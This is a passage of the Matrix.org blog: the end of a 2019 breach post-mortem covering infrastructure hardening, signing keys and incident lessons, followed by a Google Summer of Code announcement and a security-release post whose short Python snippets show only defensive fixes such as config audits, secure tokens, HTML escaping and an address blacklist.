If we’d gone through reviewing the default sshd config when we set up the datacenter in the first place, we’d have caught several of these failure modes at the outset. We’ve now done so (as per above).

We’d like to recommend that packages of openssh start having secure-by-default configurations, as a number of the old options just don’t need to exist on most newly provisioned machines.
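
For anyone wanting to run a similar review, here is a rough sketch of an audit that compares the global section of an sshd_config against the settings discussed in this post: no root login, no agent forwarding, and keys read only from /etc/ssh/authorized_keys/%u. The EXPECTED table and function name are illustrative assumptions, not our real policy, and the sketch stops at the first Match block and ignores Include.

```python
from typing import Dict, Optional

# Settings discussed in this post; adjust to your own policy.
EXPECTED = {
    "permitrootlogin": "no",
    "allowagentforwarding": "no",
    "authorizedkeysfile": "/etc/ssh/authorized_keys/%u",
}


def audit_sshd_config(config_text: str) -> Dict[str, Optional[str]]:
    """Return {keyword: actual value} for each expected setting that differs.

    A value of None means the keyword is absent, so sshd's default applies.
    """
    seen: Dict[str, str] = {}
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        keyword = parts[0].lower()  # keywords are case-insensitive
        if keyword == "match":
            break  # only the global section is checked in this sketch
        value = parts[1].strip() if len(parts) > 1 else ""
        seen.setdefault(keyword, value)  # sshd uses the first value it finds
    return {
        key: seen.get(key)
        for key, wanted in EXPECTED.items()
        if seen.get(key) != wanted
    }
```

An empty result means the global section matches the table. Anything else lists the keyword alongside the value that was actually found.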

🔗Network architecture

As mentioned in the History section, the legacy network infrastructure effectively grew organically, without really having a core network or a good split between different production environments.

We are addressing this by:

  • Splitting our infrastructure into strictly separated service domains, which are firewalled from each other and can only access each other via their respective ‘front doors’ (e.g. HTTPS APIs exposed at the loadbalancers).
    • Development
    • Intranet
    • Package Build (airgapped; see below for more details)
    • Package Distribution
    • Production, which is in turn split per class of service.
  • Access to these networks will be via VPN + SSH jumpboxes (as per above). Access to the VPN is via per-device certificate + 2FA, and SSH via keys as per above.
  • Switching to an improved internal VPN between hosts within a given network environment (i.e. we don’t trust the datacenter LAN).

We’re also running most services in containers by default going forwards (previously it was a bit of a mix of running unix processes, VMs, and occasional containers), providing an additional level of namespace isolation.

🔗Keeping patched

Needless to say, this particular breach would not have happened had we kept the public-facing Jenkins patched (although there would of course still have been scope for a 0-day attack).

Going forwards, we are establishing a formal regular process for deploying security updates rather than relying on spotting security advisories on an ad hoc basis. We are now also setting up regular vulnerability scans against production so we catch any gaps before attackers do.

Aside from our infrastructure, we’re also extending the process of regularly checking for security updates to also checking for outdated dependencies in our distributed software (Riot, Synapse, etc) too, given the discipline to regularly chase outdated software applies equally to both.

Moving all our machine deployment and configuration into Ansible allows this to be a much simpler task than before.

🔗Intrusion detection

There’s obviously a lot we need to do in terms of spotting future attacks as rapidly as possible. Amongst other strategies, we’re working on real-time log analysis for aberrant behaviour.

🔗Incident management

There is much we have learnt from managing an incident at this scale. The main highlights taken from our internal retrospective are:

  • The need for a single incident manager to coordinate the technical response and manage prioritisation and handover between those handling the incident. (We lacked a single incident manager at first, given several of the team started off that week on holiday...)
  • The benefits of gathering all relevant info and checklists onto a canonical set of shared documents rather than being spread across different chatrooms and lost in scrollback.
  • The need to have an existing inventory of services and secrets available for tracking progress and prioritisation
  • The need to have a general incident management checklist for future reference, which folks can familiarise themselves with ahead of time to avoid stuff getting forgotten. The sort of stuff which will go on our checklist in future includes:
    • Remembering to appoint named incident manager, external comms manager & internal comms manager. (They could of course be the same person, but the roles are distinct).
    • Ensuring that a sensible sequence of forensics, mitigations, communication, rotating secrets etc. is followed, rather than having to work it out on the fly and risk forgetting stuff
    • Remembering to inform the ICO (Information Commissioner’s Office) of any user data breaches
    • Guidelines on how to balance between forensics and rebuilding (i.e. how long to spend on forensics, if at all, before pulling the plug)
    • Reminders to snapshot systems for forensics & backups
    • Reminder to not redesign infrastructure during a rebuild. There were a few instances where we lost time by seizing the opportunity to try to fix design flaws whilst rebuilding, some of which were avoidable.
    • Making sure that communication isn’t sent prematurely to users (e.g. we posted the blog post asking people to update their passwords before password reset had actually been restored - apologies for that.)

🔗Configuration management

One of the major flaws once the attacker was in our network was that our internal configuration git repo was cloned on most accounts on most servers, containing within it a plethora of unencrypted secrets. Config would then get symlinked from the checkout to wherever the app or OS needed it.

This is bad in terms of leaving unencrypted secrets (database passwords, API keys etc) lying around everywhere, but also in terms of being able to automatically maintain configuration and spot unauthorised configuration changes.

Our solution is to switch all configuration management, from the OS upwards, to Ansible (which we had already established for Modular.im), using Ansible vaults to store the encrypted secrets. It’s unfortunate that we had already done the work for this (and even had been giving talks at Ansible meetups about it!) but had not yet applied it to the legacy infrastructure.

🔗Avoiding temporary measures which last forever

None of this would have happened had we been more disciplined in finishing off the temporary infrastructure from back in 2017. As a general point, we should try and do it right the first time - and failing that, assign responsibility to someone to update it and assign responsibility to someone else to check. In other words, the only way to dig out of temporary measures like this is to project manage the update or it will not happen. This is of course a general point not specific to this incident, but one well worth reiterating.

🔗Secure packaging

One of the most unfortunate mistakes highlighted by the breach is that the signing keys for the Synapse debian repository, Riot debian repository and Riot/Android releases on the Google Play Store had ended up on hosts which were compromised during the attack. This is obviously a massive fail, and is a case of the geo-distributed dev teams prioritising the convenience of a near-automated release process without thinking through the security risks of storing keys on a production server.

Whilst the keys were compromised, none of the packages that we distribute were tampered with. However, the impact on the project has been high - particularly for Riot/Android, as we cannot allow the risk of an attacker using the keys to sign and somehow distribute malicious variants of Riot/Android, and Google provides no means of recovering from a compromised signing key beyond creating a whole new app and starting over. Therefore we have lost all our ratings, reviews and download counts on Riot/Android and started over. (If you want to give the newly released app a fighting chance despite this setback, feel free to give it some stars on the Play Store). We also revoked the compromised Synapse & Riot GPG keys and created new ones (and published new instructions for how to securely set up your Synapse or Riot debian repos).

In terms of remediation, designing a secure build process is surprisingly hard, particularly for a geo-distributed team. What we have landed on is as follows:

  • Developers create a release branch to signify a new release (ensuring dependencies are pinned to known good versions).
  • We then perform all releases from a dedicated isolated release terminal.
    • This is a device which is kept disconnected from the internet, other than when doing a release, and even then it is firewalled to be able to pull data from SCM and push to the package distribution servers, but otherwise entirely isolated from the network.
    • Needless to say, the device is strictly used for nothing other than performing releases.
    • The build environment installation is scripted and installs on a fresh OS image (letting us easily build new release terminals as needed)
    • The signing keys (hardware or software) are kept exclusively on this device.
    • The publishing SSH keys (hardware or software) used to push to the packaging servers are kept exclusively on this device.
    • We physically store the device securely.
    • We ensure someone on the team always has physical access to it in order to do emergency builds.
  • Meanwhile, releases are distributed using dedicated infrastructure, entirely isolated from the rest of production.
    • These live at https://packages.matrix.org and https://packages.riot.im
    • These are minimal machines with nothing but a static web-server.
    • They are accessed only via the dedicated SSH keys stored on the release terminal.
    • These in turn can be mirrored in future to avoid a SPOF (or we could cheat and use Cloudflare’s always online feature, for better or worse).

Alternatives here included:

  • In an ideal world we’d do reproducible builds instead, and sign the build’s hash with a hardware key, but given we don’t have reproducible builds yet this will have to suffice for now.
  • We could delegate building and distribution entirely to a 3rd party setup such as OBS (as per https://github.com/matrix-org/matrix.org/issues/370). However, we have a very wide range of artefacts to build across many different platforms and OSes, so would rather build ourselves if we can.

🔗Dev and CI infrastructure

The main change in our dev and CI infrastructure is to move from Jenkins to Buildkite. The latter has been serving us well for Synapse builds over the last few months, and has now been extended to serve all the main CI pipelines that Jenkins was providing. Buildkite works by orchestrating jobs on an elastic pool of CI workers we host in our own AWS, and so far has done so quite painlessly.

The new pipelines have been set up so that where CI needs to push artefacts to production for continuous deployment (e.g. riot.im/develop), it does so by poking production via HTTPS to trigger production to pull the artefact from CI, rather than pushing the artefact via SSH to production.
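
The pull-based pattern can be sketched roughly as follows. This is an assumption-laden illustration, not our actual deployment code: the HMAC signing scheme, the ARTEFACT_URLS table, the ci.example.org URL and the function names are all hypothetical. The point it tries to show is that CI only ever names an artefact, while production decides where to fetch it from.

```python
import hashlib
import hmac
from typing import Optional

# Hypothetical allow-list: production only pulls from URLs it already knows.
ARTEFACT_URLS = {
    "riot-web-develop": "https://ci.example.org/artefacts/riot-web-develop.tar.gz",
}


def sign(secret: bytes, body: bytes) -> str:
    """Signature that CI would attach to its HTTPS poke (assumed scheme)."""
    return hmac.new(secret, body, hashlib.sha256).hexdigest()


def url_to_pull(secret: bytes, body: bytes, signature: str) -> Optional[str]:
    """Return the artefact URL to fetch, or None if the poke is rejected."""
    expected = sign(secret, body)
    # Constant-time comparison, so the check does not leak timing information.
    if not hmac.compare_digest(expected.encode(), signature.encode()):
        return None
    # The request body only names an artefact; it never supplies a URL.
    return ARTEFACT_URLS.get(body.decode("utf-8", "replace"))
```

With this shape, a compromised CI worker can at worst ask production to redeploy an artefact from a known location. It holds no SSH credentials for production at all.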

Other than CI, our strategy is:

  • Continue using GitHub for public repositories
  • Use gitlab.matrix.org for private repositories (and stuff which we don’t want to re-export via the US, like Olm)
  • Continue to host docker images on Docker Hub (despite their recent security dramas).

🔗Log minimisation and handling Personally Identifying Information (PII)

Another thing that the breach made painfully clear is that we log too much. While there’s not much evidence of the attacker going spelunking through any Matrix service log files, the fact is that whilst developing Matrix we’ve kept logging on matrix.org relatively verbose to help with debugging. There’s nothing more frustrating than trying to trace through the traffic for a bug only to discover that logging didn’t pick it up.

However, we can still improve our logging and PII-handling substantially:

  • Ensuring that wherever possible, we hash or at least truncate any PII before logging it (access tokens, matrix IDs, 3rd party IDs etc).
  • Minimising log retention to the bare minimum we need to investigate recent issues and abuse
  • Ensuring that PII is stored hashed wherever possible.
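
As a rough sketch of the first point, identifiers can be replaced with a keyed hash before they reach a log line, and secrets such as access tokens can be truncated. The helper names and the choice of HMAC-SHA256 are assumptions for illustration, not what Synapse does today. A keyed hash is used because a plain hash of a guessable value like a Matrix ID can be reversed by simply hashing candidate IDs.

```python
import hashlib
import hmac


def pseudonymise(value: str, key: bytes, length: int = 12) -> str:
    """Truncated keyed hash of a PII value.

    The same input always maps to the same output, so log lines can still
    be correlated, but the original value is not written to disk.
    """
    digest = hmac.new(key, value.encode("utf-8"), hashlib.sha256).hexdigest()
    return digest[:length]


def truncate_token(token: str, keep: int = 4) -> str:
    """Keep only the first few characters of a secret such as an access token."""
    if len(token) <= keep:
        return "..."  # too short to show any of it safely
    return token[:keep] + "..."
```

A log call would then write pseudonymise(user_id, key) instead of the user ID itself, with the key held outside the log store and rotated alongside log retention.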

Meanwhile, in Matrix itself we already are very mindful of handling PII (c.f. our privacy policies and GDPR work), but there is also more we can do, particularly:

  • Turning on end-to-end encryption by default, so that even if a server is compromised, the attacker cannot get at private message history. Everyone who uses E2EE in Matrix should have felt some relief that even though the server was compromised, their message history was safe: we need to provide that to everyone. This is https://github.com/vector-im/riot-web/issues/6779.
  • We need device audit trails in Matrix, so that even if a compromised server (or malicious server admin) temporarily adds devices to your account, you can see what’s going on. This is https://github.com/matrix-org/synapse/issues/5145
  • We need to empower users to configure history retention in their rooms, so they can limit the amount of history exposed to an attacker. This is https://github.com/matrix-org/matrix-doc/pull/1763
  • We need to provide account portability (aka decentralised accounts) so that even if a server is compromised, the users can seamlessly migrate elsewhere. The first step of this is https://github.com/matrix-org/matrix-doc/pull/1228.

🔗Conclusion

Hopefully this gives a comprehensive overview of what happened in the breach, how we handled it, and what we are doing to protect against this happening in future.

Again, we’d like to apologise for the massive inconvenience this caused to everyone caught in the crossfire. Thank you for your patience and for sticking with the project whilst we restored systems. And while it is very unfortunate that we ended up in this situation, we should at least be coming out of it much stronger in terms of infrastructure security. We’d also like to particularly thank Kade Morton for providing independent review of this post and our remediations, and everyone who reached out with #hugops during the incident (it was literally the only positive thing we had on our radar), and finally thanks to those of the Matrix team who hauled ass to rebuild the infrastructure, and also those who doubled down meanwhile to keep the rest of the project on track.

On which note, we’re going to go back to building decentralised communication protocols and reference implementations for a bit... Emoji reactions are on the horizon (at last!), as is Message Editing, RiotX/Android and a host of other long-awaited features - not to mention finally releasing Synapse 1.0. So: thanks again for flying Matrix, even during this period of extreme turbulence and, uh, hijack. Things should mainly be back to normal now and for the foreseeable.

Given the new blog doesn't have comments yet, feel free to discuss the post over at HN.

Welcome to the 2019 GSoC Participants!

07.05.2019 00:00 — GSOCAndrew Morgan

It’s that time of year again! Matrix.org is once again participating in the Google Summer of Code program. We have been allocated four student slots by Google this year, and narrowing the 18 proposals we received down to just four was a very difficult task.

In the end, we have decided on the following four students and their proposed projects:

Alexey Andreyev’s proposal involves adding end-to-end encryption to libQMatrixClient for future support in Qt/libQMatrixClient-based clients such as Quaternion and Spectral. They will be mentored by kitsune, lead developer of libQMatrixClient, and our own end-to-end encryption expert, uhoreg.

Kai Hiller’s proposal for more reliable third-party protocol bridges includes adding the ability to notify the user when a message fails to reach its final destination despite being accepted by the bridge. They will be mentored by Half-Shot.

Eisha Chen-yen-su’s proposal for Matrix Visualisations aims to “develop a tool which will visualise the event Directed Acyclic Graph data structure which describes the conversation history in a room. It will be a real-time visualisation of the DAG of a given Matrix room, as seen from the perspective of one or more HomeServers (HSes).” They state that “this tool will be useful for debugging or administration of Matrix HSes by making people able to easily see how the federation process works”. They have already posted prototypes of their tool in #gsoc:matrix.org, and it’s all written in Rust! Which makes their mentor, erikj, very happy.

And finally, Cnly’s proposal for working towards completion of Dendrite’s Client-Server API. The proposal also touches on general improvements to the codebase and increasing test coverage. Cnly will be mentored by babolivier and anoa.

Congratulations to the selected students. We look forward to working with you to complete your projects over the course of the summer holidays.

If your proposal was not selected, do not give up hope! Being an active member of the Matrix community and having a deep understanding of the ecosystem and its projects is a big part of what we look for when choosing candidates. If you stick around, you have a strong chance of being chosen in a subsequent year.

We will not be sharing individuals’ proposal documents, but students are free to share them as they please.

Security updates: Sydent 1.0.3, Synapse 0.99.3.1 and Riot/Android 0.9.0 / 0.8.99 / 0.8.28a

03.05.2019 00:00 — General, SecurityMatthew Hodgson

Hi all,

Over the last few weeks we’ve ended up getting a lot of attention from the security research community, which has been incredibly useful and massively appreciated in terms of contributions to improve the security of the reference Matrix implementations.

We’ve also set up an official Security Disclosure Policy to explain the process of reporting security issues to us safely via responsible disclosure - including a Hall of Fame to credit those who have done so. (Please mail [email protected] to remind us if we’ve forgotten you!).

Since we published the Hall of Fame yesterday, we’ve already been getting new entries and so we’re doing a set of security releases today to ensure they are mitigated asap. Unfortunately the work around this means that we’re running late in publishing the post mortem of the Apr 11 security incident - we are trying to get that out as soon as we can.

🔗Sydent 1.0.3

Sydent 1.0.3 has three security fixes:

  • Ensure that authentication tokens are generated using a secure random number generator, ensuring they cannot be predicted by an attacker. This is an important fix - please update. Thanks to Enguerran Gillier (@opnsec) for identifying and responsibly disclosing the issue!
  • Mitigate an HTML injection bug where an invalid room_id could result in malicious HTML being injected into validation emails. The fix for this is in the email template itself; you will need to update any customised email templates to be protected. Thanks to Enguerran Gillier (@opnsec) for identifying and responsibly disclosing this issue too!
  • Randomise session_ids to avoid leaking info about the total number of identity validations, and whether a given ID has been validated. Thanks to @fs0c131y for identifying and responsibly disclosing this one.
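
To illustrate the general technique behind the first and third fixes (this is a sketch, not the actual Sydent patch, and the function names are hypothetical): Python’s random module is a Mersenne Twister whose output can be predicted once enough of it has been observed, whereas the standard library’s secrets module draws from the operating system’s cryptographically secure generator.

```python
import secrets


def new_token(nbytes: int = 32) -> str:
    """Unpredictable URL-safe token built from nbytes of OS-level randomness."""
    return secrets.token_urlsafe(nbytes)


def new_session_id(nbytes: int = 16) -> str:
    """Random hex identifier; unlike a counter, it leaks no ordering or totals."""
    return secrets.token_hex(nbytes)
```

Replacing sequential IDs with random ones also means an ID no longer reveals how many validations came before it.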

If you are running Sydent as an identity server, you should update as soon as possible from https://github.com/matrix-org/sydent/releases/v1.0.3. We are not aware of any of these issues having been exploited maliciously in the wild.
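
For those maintaining customised email templates, the underlying idea of the HTML injection fix is to escape any user-controlled value before it is substituted into HTML. The snippet below is only a sketch of that idea using the standard library: the template text and function name are made up, and Sydent’s real templates differ.

```python
import html

# Hypothetical template, for illustration only.
TEMPLATE = "<p>You have been invited to the room <b>{room_id}</b>.</p>"


def render_invite(room_id: str) -> str:
    """Substitute room_id into the template with HTML metacharacters escaped."""
    return TEMPLATE.format(room_id=html.escape(room_id, quote=True))
```

With escaping in place, a room_id containing markup is rendered as literal text in the email rather than being interpreted as HTML.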

🔗Synapse 0.99.3.1

Synapse 0.99.3.1 is a security update for two fixes:

  • Ensure that random IDs in Synapse are generated using a secure random number generator, ensuring they cannot be predicted by an attacker. Thanks to Enguerran Gillier (@opnsec) for identifying and responsibly disclosing this issue!
  • Add 0.0.0.0/32 and ::/128 to the URL preview blacklist configuration, ensuring that an attacker cannot make connections to localhost. Thanks to Enguerran Gillier (@opnsec) for identifying and responsibly disclosing this issue too!
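
The blacklist check itself can be sketched with Python’s ipaddress module. This is an illustration rather than Synapse’s implementation: the BLACKLIST below contains the two ranges named above plus the usual loopback ranges, which are added here as an assumption, and a real deployment would list private ranges too.

```python
import ipaddress

# The two ranges from this release, plus loopback ranges (illustrative).
BLACKLIST = [
    ipaddress.ip_network(net)
    for net in ("0.0.0.0/32", "::/128", "127.0.0.0/8", "::1/128")
]


def is_blacklisted(address: str) -> bool:
    """Return True if the IP address falls inside any blacklisted network."""
    ip = ipaddress.ip_address(address)
    # Membership tests across IP versions simply evaluate to False.
    return any(ip in net for net in BLACKLIST)
```

Such a check only helps if it is applied to the address a hostname actually resolves to, not to the hostname string in the URL.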

You can update from https://github.com/matrix-org/synapse/releases or similar as normal. We are not aware of any of these issues having been exploited maliciously in the wild.

(Synapse 0.99.3.2 was released shortly afterwards to fix a non-security issue with the Debian packaging)

🔗Riot/Android 0.9.x/0.8.99 (Google Play) and 0.8.28a (F-Droid)

Riot/Android has an important security fix which shipped over the course of the last week in various versions of the app:

  • Remove obsolete and buggy ContentProvider which could allow a malicious local app to compromise account data. Many thanks to Julien Thomas (@julien_thomas) from Protektoid Project for identifying this and responsibly disclosing it!

The fix for this has shipped on F-Droid since 0.8.28a, and on the Play Store, the fix is present in both v0.9.0 (the first version of the re-published Riot app) and v0.8.99 (the last version of the old Riot app, which told everyone to reinstall). Other forks of Riot which we’re aware of have also been informed and should be updated.

If you haven’t already updated, please do so now.